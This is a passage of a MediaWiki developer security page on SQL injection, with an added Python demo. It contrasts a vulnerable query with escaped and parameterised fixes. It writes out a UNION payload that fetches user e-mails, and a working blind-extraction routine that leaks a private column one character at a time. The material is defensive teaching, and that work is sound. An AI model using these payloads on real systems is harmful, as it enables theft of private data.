
SQL injection/ha

From mediawiki.org
This page is a translated version of the page SQL injection and the translation is 5% complete.

Overview

SQL injection is a type of attack that exploits missing or incorrect input validation and data typing in the way an application builds SQL queries.

When successful, the attack lets the attacker inject their own SQL into an existing query. The attacker may then be able to read private data, cause a denial of service or trigger other unintended behaviour. In the worst case, the injected SQL is the first step towards full control of the system, chained with further vulnerabilities in the database server, system utilities and operating system.

For an overview of SQL injection attacks, review Wikipedia's SQL Injection page.

Example

The following code snippet would allow an attacker to execute their own SQL commands, because the request parameter is interpolated into the query string without validation or escaping (the snippet is also a syntax error in Oracle, which has no LIMIT clause).

$limit = $wgRequest->getVal( 'limit' ); // raw, attacker-controlled string
$res = $db->query( "SELECT * from kitties LIMIT $limit" ); // interpolated straight into the SQL text

Before MW 1.35, the preferred way to run the query above would have been:

$limit = $wgRequest->getVal( 'limit' );
$limit = intval( $limit ); // OPTIONAL validation
$res = $db->select( 'kitties',
                    '*',
                    false,
                    __METHOD__,
                    array( 'LIMIT' => $limit ) // REQUIRED automatic escaping
);

See Manual:Database access for more recent approaches to building SQL queries using the SelectQueryBuilder class.

To exploit the vulnerability in the first snippet and fetch the email addresses of registered wiki users, the attacker would send a GET query string of:

?limit=%201%20union%20select%20user_email%20from%20user;
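The following Python script is an added example and is not code from this page or from the MediaWiki project. It reproduces the shape of the vulnerable snippet against an in-memory SQLite database and puts the validated, parameterised form beside it, standing in for the intval() call and the select() wrapper. The kitties and user tables, their rows and the admin@example.org address are constructed for the demo. SQLite does not accept UNION directly after LIMIT, so instead of the page's payload the attacker side uses a scalar subquery in the LIMIT position, which SQLite does accept, and reads the e-mail one character at a time from the number of rows returned.

```python
import sqlite3

# Constructed sample data for this demo (not MediaWiki's schema).
ADMIN_EMAIL = "admin@example.org"
KITTY_ROWS = 200  # must exceed the largest code point we want to read (ASCII < 128)


def build_db() -> sqlite3.Connection:
    """Build an in-memory database: a large 'kitties' table and a 'user' table
    holding the private column the attacker is after."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE kitties (id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO kitties (name) VALUES (?)",
                    [(f"kitty{i}",) for i in range(KITTY_ROWS)])
    con.execute("CREATE TABLE user (user_id INTEGER PRIMARY KEY, user_email TEXT)")
    con.execute("INSERT INTO user VALUES (1, ?)", (ADMIN_EMAIL,))
    return con


def vulnerable_select(con: sqlite3.Connection, limit: str) -> list:
    """Same shape as the page's first snippet: the request value is
    interpolated straight into the SQL text."""
    return con.execute(f"SELECT * FROM kitties LIMIT {limit}").fetchall()


def hardened_select(con: sqlite3.Connection, limit: str) -> list:
    """Validate to an integer first and bind it as a parameter, the role that
    intval() and the select() wrapper play in the page's second snippet.
    Anything that is not an integer never reaches the SQL parser."""
    n = int(limit)  # ValueError on "1 union ..." or "(SELECT ...)"
    if n < 0:
        raise ValueError("limit must be non-negative")  # LIMIT -1 means 'no limit' in SQLite
    return con.execute("SELECT * FROM kitties LIMIT ?", (n,)).fetchall()


def rows_for_payload(con: sqlite3.Connection, expr: str) -> int:
    """Attacker helper: SQLite accepts any expression after LIMIT, including a
    scalar subquery, so the row count of the result reveals the subquery's
    numeric value (capped at the size of 'kitties')."""
    return len(vulnerable_select(con, f"({expr})"))


def leak_email(con: sqlite3.Connection) -> str:
    """Blind extraction through the vulnerable path: first the length,
    then one code point per request."""
    length = rows_for_payload(
        con, "SELECT length(user_email) FROM user WHERE user_id = 1")
    chars = []
    for pos in range(1, length + 1):
        code = rows_for_payload(
            con, f"SELECT unicode(substr(user_email, {pos}, 1)) "
                 "FROM user WHERE user_id = 1")
        chars.append(chr(code))
    return "".join(chars)


def hardened_rejects(con: sqlite3.Connection, payload: str) -> bool:
    """True when the hardened path refuses the payload instead of running it."""
    try:
        hardened_select(con, payload)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("vulnerable path leaks:", leak_email(db))
    union = " 1 union select user_email from user"  # the page's payload, URL-decoded
    print("hardened path rejects the page's payload:", hardened_rejects(db, union))
    print("hardened path with a real number:", len(hardened_select(db, "3")), "rows")
```

One difference from PHP is worth knowing: intval( " 1 union select ..." ) does not raise, it silently truncates to 1, so in MediaWiki the page's payload degrades to a harmless LIMIT 1, while Python's int() raises on the same input. Either way the attacker's text never becomes part of the SQL, which is the property that matters.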


SQL Injection and MediaWiki

MediaWiki has a custom SQL generation interface which has proven effective at eliminating SQL injection vulnerabilities, because callers pass table names, fields, conditions and options as separate values that the interface quotes and escapes itself. The same interface also provides DBMS abstraction and features such as table prefixes.

To keep MediaWiki safe from SQL injection: